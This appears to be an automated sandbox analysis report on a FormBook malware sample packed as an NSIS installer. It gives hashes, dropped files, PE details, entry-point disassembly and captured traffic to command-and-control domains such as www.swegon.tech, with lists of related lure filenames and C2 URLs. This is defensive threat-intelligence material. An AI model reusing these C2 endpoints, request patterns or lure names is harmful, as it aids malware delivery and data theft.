                        • www.lecoledu4emeage.com/gg84/?URp=0jl37nQyisdHj9++mwRPJy+xxTODqjX2ku6HL2RD1bf8jTWL05XNFhhTfMwT6fCm5Y+j&7nU4D=2dDT3
                        Invoice.exeGet hashmaliciousFormBookBrowse
                        • www.flaviosilva.online/cz5n/?RMt6VS=ftIocKHS4DHhHbC/qmsD/rv9BiSVUhy1vaSO/Y7pB9MfJoKwX2mjTTAdPXhHWB5Cf/e3mbanL4w8Y2YFAw//RVSHR3aQGLfowb7LTt9gXqqy&mhD2S=xFOKq
                        Documents.exeGet hashmaliciousFormBookBrowse
                        • www.flaviosilva.online/cz5n/?ijpLUx=ftIocKHS4DHhHbC/qmsD/rv9BiSVUhy1vaSO/Y7pB9MfJoKwX2mjTTAdPXhHWB5Cf/e3mbanL4w8Y2YFAw/Ed0TCbjPuUqC63g==&6ZoD=bhrt9_zYDQ
                        Documents.exeGet hashmaliciousFormBookBrowse
                        • www.flaviosilva.online/cz5n/?_RzZz=ftIocKHS4DHhHbC/qmsD/rv9BiSVUhy1vaSO/Y7pB9MfJoKwX2mjTTAdPXhHWB5Cf/e3mbanL4w8Y2YFAw//RVSHR3aQGLfowb7LTt9gXqqy&om2=xIuxrOTDSx
                        Documents.exeGet hashmaliciousFormBookBrowse
                        • www.flaviosilva.online/cz5n/?Ssok=ftIocKHS4DHhHbC/qmsD/rv9BiSVUhy1vaSO/Y7pB9MfJoKwX2mjTTAdPXhHWB5Cf/e3mbanL4w8Y2YFAw/Ed2SQWEzuGaaM3g==&1fN91=FJFft4ZVnQubH
                        PI160256.exeGet hashmaliciousFormBookBrowse
                        • www.flaviosilva.online/cz5n/?UUQQSY2=ftIocKHS4DHhHbC/qmsD/rv9BiSVUhy1vaSO/Y7pB9MfJoKwX2mjTTAdPXhHWB5Cf/e3mbanL4w8Y2YFAw//RVSHR3aQGLfowb7LTt9gXqqy&F7=zYCXuN8v
                        rpayment.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.solutionsquik.net/vg57/?vb1S=uU2JNTATo&XtCa4=JuvBI6GNJ7B19ZNzGvZj0zJSJeiwdSbkPyARskm/5xz7GE3LX8TYJk4heqzaJ+xq2j6Qf6smanThsJJ5j5/bHqVaOb0YPb4oww==
                        NEWORDER.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.victorywash.co.uk/2huh/?sRp=8ostyhaqpOrps&5b=8pdW9QI9iqeO48mTO37sBXHEKQznS/B9dkJ7QZb4zC8Fo2S0kKHwZZqiHDDJODppSCRdilR1P3xK20n3QrdxP84LjFOmxNSs2w==
                        E-Dekont.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.khukhrainworldbrotherhood.com/m62e/?k0D=R+V2qaC1XMtrRTqmFS/tH0N2mS0TrF/v0f32JYCU4JE+FKIpRucCWFL33ADFQO+wQFMZ&a4HxM=3flpdH20DhBhDr9
                        230227.exeGet hashmaliciousFormBookBrowse
                        • www.imaliaskari.com/keht/?dO=xmfHyfY3/r1L4Ez2uB/lGCdoND9Xxz4tNm/Dz71+5Zl1bz50qtJUzKMfK5MLts3CM0x/pmjeV8IVv/XrzzsvWBQOVm8NO+e3PQ==&8xfLDX=KZulFzmVGXCfU
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          www.incentiveexcellence.com | SecuriteInfo.com.Exploit.CVE-2017-11882.123.17263.30962.rtf | malicious | FormBook | 66.113.136.229
                          overdue.aliyun.com | w8jII3Mlbs.exe | malicious | FormBook | 170.33.96.51
                           | PO 80555231 Pdf.exe | malicious | FormBook | 170.33.96.51
                           | 2384de40-a1de-4db0-a358-6ea765fb272a.pptx | malicious | Unknown | 170.33.9.230
                           | e-dekont.exe | malicious | FormBook | 170.33.9.230
                           | kgKZQkHkMV.exe | malicious | FormBook | 170.33.9.230
                           | 6hyWrD20Ho.exe | malicious | FormBook | 170.33.9.230
                           | PO.xlsx | malicious | FormBook | 170.33.9.230
                           | Alligator Pty Ltd Quote.doc | malicious | FormBook | 170.33.9.230
                           | Lv9eznkydx.exe | malicious | Unknown | 170.33.9.230
                           | UZOM POWER.exe | malicious | FormBook | 170.33.9.230
                           | Af2ehGbXlD.exe | malicious | FormBook | 170.33.9.230
                           | DHL Shipment Notification.PDF.exe | malicious | FormBook | 170.33.9.230
                           | DHL Shipment Notification,PDF.exe | malicious | FormBook | 170.33.9.230
                           | Drawing.exe | malicious | FormBook | 170.33.9.230
                           | TT-Bank-Slip.exe | malicious | FormBook | 170.33.9.230
                           | Product_Samples.exe | malicious | FormBook | 170.33.9.230
                           | PO_2021005.exe | malicious | FormBook | 170.33.9.230
                           | POSWM240521.exe | malicious | FormBook | 170.33.9.230
                           | ee7727ed_by_Libranalysis.exe | malicious | FormBook GuLoader | 170.33.9.230
                           | 4231.pdf.exe | malicious | FormBook | 170.33.9.230
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          AS-HOSTINGERLT | pete.theron Retirement Funds Increased Contribution Statement_Payments.htm | malicious | HTMLPhisher | 45.15.25.111
                           | forest service pse agreement form 53882.js | malicious | Unknown | 194.59.164.48
                           | ian.marshall RRSP Increased Contribution Statement_Payments.htm | malicious | HTMLPhisher | 31.220.60.210
                           | RRSP Increased Contribution Statement_Payments.htm | malicious | HTMLPhisher | 31.220.60.210
                           | pbuchanan RRSP Increased Contribution Statement_Payments.htm | malicious | HTMLPhisher | 31.220.60.210
                           | daniel.ding Retirement Funds Increased Contribution Statement_Payments.htm | malicious | HTMLPhisher | 31.220.60.210
                           | Background Photo Editor_8.08_apkcombo.com(1).apk | malicious | Unknown | 193.46.196.51
                           | Background Photo Editor_8.08_apkcombo.com(1).apk | malicious | Unknown | 193.46.196.51
                           | Image_0000384757.vbs | malicious | FormBook | 2.57.90.16
                           | 81m7ilw9ep2T7m2c8lY6iwcwfFOaKRq0Ll.dll | malicious | Emotet | 153.92.5.27
                           | iYp2OPN5eO.dll | malicious | Emotet | 153.92.5.27
                           | ZrzLi60LcL5vW.dll | malicious | Emotet | 153.92.5.27
                           | DHL_Express_INVOICE_AWB_CI_BL_PDF.exe | malicious | FormBook | 2.57.90.16
                           | fattura.doc | malicious | Emotet | 153.92.5.27
                           | o0G3mAJ7Ud.exe | malicious | FormBook, GuLoader | 2.57.90.16
                           | hesaphareketi-01.PDF.exe | malicious | FormBook | 2.57.90.16
                           | 20320220702.js | malicious | WSHRAT | 194.59.164.67
                           | Form - Mar 09, 2023.doc | malicious | Emotet | 153.92.5.27
                          ASEPL-AS-APAlibabacomSingaporeE-CommercePrivateLimited | w8jII3Mlbs.exe | malicious | FormBook | 170.33.96.51
                           | PO 80555231 Pdf.exe | malicious | FormBook | 170.33.96.51
                           | http://cdn.examhome.net | malicious | Unknown | 170.33.9.227
                           | http://cdn.examhome.net | malicious | Unknown | 170.33.9.227
                           | 2384de40-a1de-4db0-a358-6ea765fb272a.pptx | malicious | Unknown | 170.33.9.230
                           | KzTwbZkCyW.dll | malicious | Wannacry | 170.33.115.14
                           | 0ZY5S178zS.dll | malicious | Wannacry | 170.33.28.122
                           | fcZBQq5qMC.dll | malicious | Wannacry | 170.33.217.29
                           | aJF1hL1hAJ.dll | malicious | Wannacry | 170.33.70.3
                           | irc.i686.vir | malicious | Mirai | 170.33.213.203
                           | kp2PrktbeF | malicious | Mirai | 170.33.173.128
                           | e-dekont.exe | malicious | FormBook | 170.33.9.230
                           | x86 | malicious | Mirai | 170.33.213.209
                           | uhZvCiriMy | malicious | Mirai | 170.33.213.209
                           | kgKZQkHkMV.exe | malicious | FormBook | 170.33.9.230
                           | PO.xlsx | malicious | FormBook | 170.33.9.230
                           | Alligator Pty Ltd Quote.doc | malicious | FormBook | 170.33.9.230
                           | DHL-D02816048INV.exe | malicious | FormBook | 170.33.14.35
                           | Payment Advice_pdf.exe | malicious | FormBook | 170.33.12.250
                           | xpbSY3omz8.exe | malicious | FormBook | 170.33.12.250
                        No context
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          C:\Users\user\AppData\Local\Temp\afhjjq.exe | PO130323_-_MARINOVA-GROUP.doc | malicious | FormBook |
                          Process:C:\Windows\explorer.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):984
                          Entropy (8bit):5.2414849034866355
                          Encrypted:false
                          SSDEEP:24:Yq6CUXyhmbmPlbNdB6hmYmPlz0JahmNmPlHZ6T06Mhm6mPlbxdB6hm3mPl7KTdB2:YqDUXycSNbNdUcVNz0JacQNHZ6T06Mcs
                          MD5:4816271302882BDFB06EE40F624169D1
                          SHA1:A8F07F0A5940C4A9D4DAD112787FE109CCACA869
                          SHA-256:26D30DFFC5E2C493FF97B32C775C98630F0466D49144778BAE2688BA0716C760
                          SHA-512:3D46AA6777AF386524E65D8D158201B699F766A5640A3E917CFA78E337475F910A839B93E0097C6651D2FCBE02ED7BFAF9EF8274C9632A88D06985168087823B
                          Malicious:false
                          Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4155601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4145601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4135601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":4125601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4115601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4105601904,"LastSwitchedHighPart":30747926,"PrePopulated":true}]}
                          Process:C:\Users\user\Desktop\YSpCB8DEek.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):61440
                          Entropy (8bit):6.26576970039738
                          Encrypted:false
                          SSDEEP:768:oXJxBLApCDxvhqBrcbQdYPaPfhJAx1oZakLSO0OYCiPBjgFSd+ChG5oev3P:oXBdxsBwfaPJJtZFLkPay+V5oe/
                          MD5:6C148CA1A207DD5BE97C1726A9F4BABF
                          SHA1:5D83F24590C088BDBC2FF57517E3F1D4F4294F82
                          SHA-256:C9050FBAD700FC0418AAAB01231CF06AC3505F581846C075774E1D3EA5967F49
                          SHA-512:F42AEEAE92273F6E00CEFF29FD62A76C0D5E5D6BE9192EFE939DC2C3934863333EE7875AC56530CB333B46EDC1CD006CEBF4DBB3D5FF848D18FEE8F6D74BB5B1
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 30%
                          Joe Sandbox View:
                          • Filename: PO130323_-_MARINOVA-GROUP.doc, Detection: malicious, Browse
                          Process:C:\Users\user\Desktop\YSpCB8DEek.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6141
                          Entropy (8bit):7.137960909941223
                          Encrypted:false
                          SSDEEP:96:Farc6oYOEg/DrYuPk2XO5oSw0JTh4mbhvQF7KGOCAdqM5d7j5xXIf/3AVWmPX:FarcRxTXhX1SJlhPV07Kn4AdMvNmPX
                          MD5:AA88817FC5FD4CD5A7103798997D04B9
                          SHA1:11B7ED37BAB8E7D5A4966673D202730E89F94AF0
                          SHA-256:77FD4ABEA079556813970A1B1AD65D682C4539E98812981E07485C955434C07F
                          SHA-512:774419F331641F77A5ABEBAA42DC494E3567C25AB4A1F36003F70F3A38FE8516686DC652FEAD48E9DD3CA3C577905A60495F25EFC955BC372974DB2D2820C1EF
                          Malicious:false
                          Process:C:\Users\user\Desktop\YSpCB8DEek.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):210121
                          Entropy (8bit):7.993466491121605
                          Encrypted:true
                          SSDEEP:6144:8cBH1w3LOwHHItwB9FuhQw88TRlttw86RQ2N:tHKLZHItw8+w88TRlN6RQK
                          MD5:A4C230F42D52806C6779B507BEB4C4A4
                          SHA1:AF46D2A7ED595DEDA5E6CE5C6D2A6B313B02D575
                          SHA-256:B76CC6EB93B26C0338E12678D98299C4F8369D120BEBA567809C82F4AD7CAC05
                          SHA-512:BF3DA03A2C7CF5C0BFED81AAB1F4D40D5F1F941AB1E160E54553BC9C37B979421A3C36B72A586E9B02EA8D106BA640B962C065AA6DE67AA06664E717A1ACA723
                          Malicious:false
                          Process:C:\Users\user\Desktop\YSpCB8DEek.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):291732
                          Entropy (8bit):7.662840821381332
                          Encrypted:false
                          SSDEEP:6144:6cBH1w3LOwHHItwB9FuhQw88TRlttw86RQ2hzp7UH3:nHKLZHItw8+w88TRlN6RQeGH
                          MD5:C2BD55F529A34EC18FEF9FAEB69547FB
                          SHA1:0A09C36745799061847A82CB1896AEDB85260FA3
                          SHA-256:43047F6EF3E258AF4BA08EBA64E8F9DC538BBFD985F4151D054C44375FCC47BD
                          SHA-512:2CFA99FB56B5691079EB256D19F31DF0D6267260241BFF4106FF8EB261D7382261E6DD32595D519AF57A364B43D708C1D21F4CF7C157117C7B9B41B47600F4C1
                          Malicious:false
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                          Entropy (8bit):7.913061878797616
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:YSpCB8DEek.exe
                          File size:271045
                          MD5:d927de8cecb8523b956d2bb2098d20ef
                          SHA1:cb01b1c8bea968c8919c7303d10ec5b4c520691c
                          SHA256:e2f96798a7d58ac8a06c39d4459336c8fddafec67fe12cda3c9d4e497702601f
                          SHA512:50a0c0311ef199cd18b7c60030b01ecabef3bcad5f63cc5f9f81fb9f43c8b61ff7224b2659c109e1c91bdd4a0b32e0c1ce31ab49544bfc487fec35a318eed6a2
                          SSDEEP:6144:TYa6H9QQB+NJQKc1gwzCJNIuhjtUc3sCuv9rej4sDza9OvLQO8:TYp9QQB+3QKc6XIuZK7Cey6xZ
                          TLSH:AE4412953AF8E02BEC7317736BB853265FFAAD438455860B2740D70EFA252548E1F362
                          Entrypoint:0x403640
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:61259b55b8912888e90f516ca08dc514
                          Instruction
                          push ebp
                          mov ebp, esp
                          sub esp, 000003F4h
                          push ebx
                          push esi
                          push edi
                          push 00000020h
                          pop edi
                          xor ebx, ebx
                          push 00008001h
                          mov dword ptr [ebp-14h], ebx
                          mov dword ptr [ebp-04h], 0040A230h
                          mov dword ptr [ebp-10h], ebx
                          call dword ptr [004080C8h]
                          mov esi, dword ptr [004080CCh]
                          lea eax, dword ptr [ebp-00000140h]
                          push eax
                          mov dword ptr [ebp-0000012Ch], ebx
                          mov dword ptr [ebp-2Ch], ebx
                          mov dword ptr [ebp-28h], ebx
                          mov dword ptr [ebp-00000140h], 0000011Ch
                          call esi
                          test eax, eax
                          jne 00007FD135241FFAh
                          lea eax, dword ptr [ebp-00000140h]
                          mov dword ptr [ebp-00000140h], 00000114h
                          push eax
                          call esi
                          mov ax, word ptr [ebp-0000012Ch]
                          mov ecx, dword ptr [ebp-00000112h]
                          sub ax, 00000053h
                          add ecx, FFFFFFD0h
                          neg ax
                          sbb eax, eax
                          mov byte ptr [ebp-26h], 00000004h
                          not eax
                          and eax, ecx
                          mov word ptr [ebp-2Ch], ax
                          cmp dword ptr [ebp-0000013Ch], 0Ah
                          jnc 00007FD135241FCAh
                          and word ptr [ebp-00000132h], 0000h
                          mov eax, dword ptr [ebp-00000134h]
                          movzx ecx, byte ptr [ebp-00000138h]
                          mov dword ptr [0042A318h], eax
                          xor eax, eax
                          mov ah, byte ptr [ebp-0000013Ch]
                          movzx eax, ax
                          or eax, ecx
                          xor ecx, ecx
                          mov ch, byte ptr [ebp-2Ch]
                          movzx ecx, cx
                          shl eax, 10h
                          or eax, ecx
                          Programming Language:
                          • [EXP] VC++ 6.0 SP5 build 8804
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b000 | 0xd28 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0x6676 | 0x6800 | False | 0.6568134014423077 | data | 6.4174599871908855 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata | 0x8000 | 0x139a | 0x1400 | False | 0.4498046875 | data | 5.141066817170598 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data | 0xa000 | 0x20378 | 0x600 | False | 0.509765625 | data | 4.110582127654237 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .ndata | 0x2b000 | 0x10000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc | 0x3b000 | 0xd28 | 0xe00 | False | 0.3618861607142857 | data | 4.101309070607735 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country
                          RT_ICON | 0x3b1d8 | 0x330 | Device independent bitmap graphic, 48 x 96 x 1, image size 384, 2 important colors | English | United States
                          RT_DIALOG | 0x3b508 | 0x100 | data | English | United States
                          RT_DIALOG | 0x3b608 | 0x11c | data | English | United States
                          RT_DIALOG | 0x3b728 | 0x60 | data | English | United States
                          RT_GROUP_ICON | 0x3b788 | 0x14 | data | English | United States
                          RT_VERSION | 0x3b7a0 | 0x248 | data | English | United States
                          RT_MANIFEST | 0x3b9e8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
                          DLL | Import
                          ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                          SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                          ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                          COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                          USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                          GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                          KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                          Language of compilation system | Country where language is spoken
                          English | United States
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 14, 2023 07:26:26.452915907 CET4969280192.168.2.5170.33.13.246
                          Mar 14, 2023 07:26:26.488609076 CET8049692170.33.13.246192.168.2.5
                          Mar 14, 2023 07:26:26.488878965 CET4969280192.168.2.5170.33.13.246
                          Mar 14, 2023 07:26:26.489401102 CET4969280192.168.2.5170.33.13.246
                          Mar 14, 2023 07:26:26.753766060 CET4969280192.168.2.5170.33.13.246
                          Mar 14, 2023 07:26:26.930221081 CET8049692170.33.13.246192.168.2.5
                          Mar 14, 2023 07:26:26.931668043 CET8049692170.33.13.246192.168.2.5
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
| Mar 14, 2023 07:26:25.184062004 CET | 56953 | 53 | 192.168.2.5 | 8.8.8.8 |
| Mar 14, 2023 07:26:26.175966978 CET | 56953 | 53 | 192.168.2.5 | 8.8.8.8 |
| Mar 14, 2023 07:26:26.445321083 CET | 53 | 56953 | 8.8.8.8 | 192.168.2.5 |
| Mar 14, 2023 07:26:26.462286949 CET | 53 | 56953 | 8.8.8.8 | 192.168.2.5 |
| Mar 14, 2023 07:26:47.485537052 CET | 59287 | 53 | 192.168.2.5 | 8.8.8.8 |
| Mar 14, 2023 07:26:47.518074036 CET | 53 | 59287 | 8.8.8.8 | 192.168.2.5 |
| Mar 14, 2023 07:27:08.241353035 CET | 58648 | 53 | 192.168.2.5 | 8.8.8.8 |
| Mar 14, 2023 07:27:08.387466908 CET | 53 | 58648 | 8.8.8.8 | 192.168.2.5 |

| Timestamp | Source IP | Dest IP | Checksum | Code | Type |
| --- | --- | --- | --- | --- | --- |
| Mar 14, 2023 07:26:26.462428093 CET | 192.168.2.5 | 8.8.8.8 | d024 | (Port unreachable) | Destination Unreachable |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Mar 14, 2023 07:26:25.184062004 CET | 192.168.2.5 | 8.8.8.8 | 0x3fa3 | Standard query (0) | www.swegon.tech | A (IP address) | IN (0x0001) | false |
| Mar 14, 2023 07:26:26.175966978 CET | 192.168.2.5 | 8.8.8.8 | 0x3fa3 | Standard query (0) | www.swegon.tech | A (IP address) | IN (0x0001) | false |
| Mar 14, 2023 07:26:47.485537052 CET | 192.168.2.5 | 8.8.8.8 | 0x7868 | Standard query (0) | www.linnus.shop | A (IP address) | IN (0x0001) | false |
| Mar 14, 2023 07:27:08.241353035 CET | 192.168.2.5 | 8.8.8.8 | 0xafd7 | Standard query (0) | www.incentiveexcellence.com | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Mar 14, 2023 07:26:26.445321083 CET | 8.8.8.8 | 192.168.2.5 | 0x3fa3 | No error (0) | www.swegon.tech | overdue.aliyun.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Mar 14, 2023 07:26:26.445321083 CET | 8.8.8.8 | 192.168.2.5 | 0x3fa3 | No error (0) | overdue.aliyun.com | | 170.33.13.246 | A (IP address) | IN (0x0001) | false |
| Mar 14, 2023 07:26:26.462286949 CET | 8.8.8.8 | 192.168.2.5 | 0x3fa3 | No error (0) | www.swegon.tech | overdue.aliyun.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Mar 14, 2023 07:26:26.462286949 CET | 8.8.8.8 | 192.168.2.5 | 0x3fa3 | No error (0) | overdue.aliyun.com | | 170.33.13.246 | A (IP address) | IN (0x0001) | false |
| Mar 14, 2023 07:26:47.518074036 CET | 8.8.8.8 | 192.168.2.5 | 0x7868 | No error (0) | www.linnus.shop | linnus.shop | | CNAME (Canonical name) | IN (0x0001) | false |
| Mar 14, 2023 07:26:47.518074036 CET | 8.8.8.8 | 192.168.2.5 | 0x7868 | No error (0) | linnus.shop | | 2.57.90.16 | A (IP address) | IN (0x0001) | false |
| Mar 14, 2023 07:27:08.387466908 CET | 8.8.8.8 | 192.168.2.5 | 0xafd7 | No error (0) | www.incentiveexcellence.com | | 66.113.136.229 | A (IP address) | IN (0x0001) | false |

                          • www.swegon.tech
                          • www.linnus.shop
                          • www.incentiveexcellence.com
                          Session ID: 0 | Source IP: 192.168.2.5 | Source Port: 49692 | Destination IP: 170.33.13.246 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                          Timestamp: Mar 14, 2023 07:26:26.489401102 CET | kBytes transferred: 18 | Direction: OUT | Data:
                          GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6 HTTP/1.1
                          Host: www.swegon.tech
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Timestamp: Mar 14, 2023 07:26:26.753766060 CET | kBytes transferred: 18 | Direction: OUT | Data:
                          GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6 HTTP/1.1
                          Host: www.swegon.tech
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Timestamp: Mar 14, 2023 07:26:26.931668043 CET | kBytes transferred: 19 | Direction: IN | Data:
                          HTTP/1.1 403 Forbidden
                          Date: Tue, 14 Mar 2023 06:26:26 GMT
                          Content-Type: text/html
                          Content-Length: 677
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.swegon.tech/nes8/?wP=KB3xslvhyf-4Q2Gp&amp;5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6</td></tr><tr><td>Server:</td><td>izj6c7rml031xf17m0lnliz</td></tr><tr><td>Date:</td><td>2023/03/14 14:26:26</td></tr></table><hr/>Powered by Tengine/2.3.2<hr><center>tengine</center></body></html>


